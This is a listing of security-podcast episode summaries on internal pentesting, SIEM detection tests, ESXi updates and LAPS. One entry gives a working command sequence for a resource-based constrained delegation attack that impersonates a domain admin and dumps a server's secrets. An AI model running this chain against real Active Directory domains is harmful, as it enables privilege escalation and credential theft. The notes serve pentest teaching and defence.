7MS #426: Tales of Internal Pentest Pwnage - Part 19

Today's another fun tale of pentest pwnage - specifically focused on cracking a hash type I'd never paid much attention to before: cached domain credentials. I also learned that you can at least partially protect against this type of hash being captured by checking out this article, which has you set the following setting in GPO: Under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options set Interactive logon: Number of previous logons to cache to 0. Be careful, as you will have login problems if a domain controller is not immediately accessible! In regards to defending against secretsdump, this article I found this article to be super interesting.

24 Jun 202234min

Today we're sharing an updates to episode #512 where we ran Rapid7's InsightIDR through a bunch of attacks: Active Directory enumeration via SharpHound Password spraying through Rubeus Kerberoasting and ASREPRoasting via Rubeus Network protocol poisoning with Inveigh. Looking for a free way to detect protocol poisoning? Check out CanaryPi. Hash dumping using Impacket. I also talk about an interesting Twitter thread that discusses the detection of hash dumping. Pass-the-hash attacks with CrackMapExec In today's episode I share some emails and conversations we had with Rapid7 about these tests and their results. I'm also thrilled to share with you the articles themselves: Getting Started with Rapid7 InsightIDR: A SIEM Tutorial Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

17 Jun 202233min

I'm extra psyched today, because today's episode (which is all about updating your VMWare ESXi version via command line) is complemented by video: https://www.youtube.com/watch?v=0-XAO32LEPY Shortly after recording this video, I found this awesome article which walks you through a different way to tackle these updates: List all upgrade profiles: esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml Grep for just the ones you want (in my case ESXi 7.x): esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0 Apply the one you want! esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0

10 Jun 202233min

Well friends, it has been a while since we talked about Microsoft's awesome Local Administrator Password Solution - specifically, the last time was way back in 2017! Lately I've been training some companies on how to install it by giving them a live walkthrough in our Light Pentest LITE lab, so I thought it would be a good time to write up a refreshed, down and dirty install guide. Here we go! (See the show notes for today's episode for more details!)

3 Jun 202238min

Hey friends, a while back in episode #505 we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in on just the networks you're interested in and filter out a bunch of noisy events from bettercap in the process.

27 Mai 202235min

Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD: # From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domain\some.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources. Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!

20 Mai 202257min

Hey friends, today we're giving another peek behind the curtain of what it's like to run a cybersecurity consultancy. Topics include: Setting the right communication cadence - and communication channels - with a customer during a pentest. Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here). How we're using Intercom to publish self-help/FAQ articles for 7MS.

13 Mai 202248min

Hey friends, it's another fun tale of pentest pwnage today! This one talks about cool things you can do when you have full rights over an OU in Active Directory. Important links to review: BloodHound edges DACL Trouble: Generic All on OUs AD prep bug in Windows Server 2016

7 Mai 202246min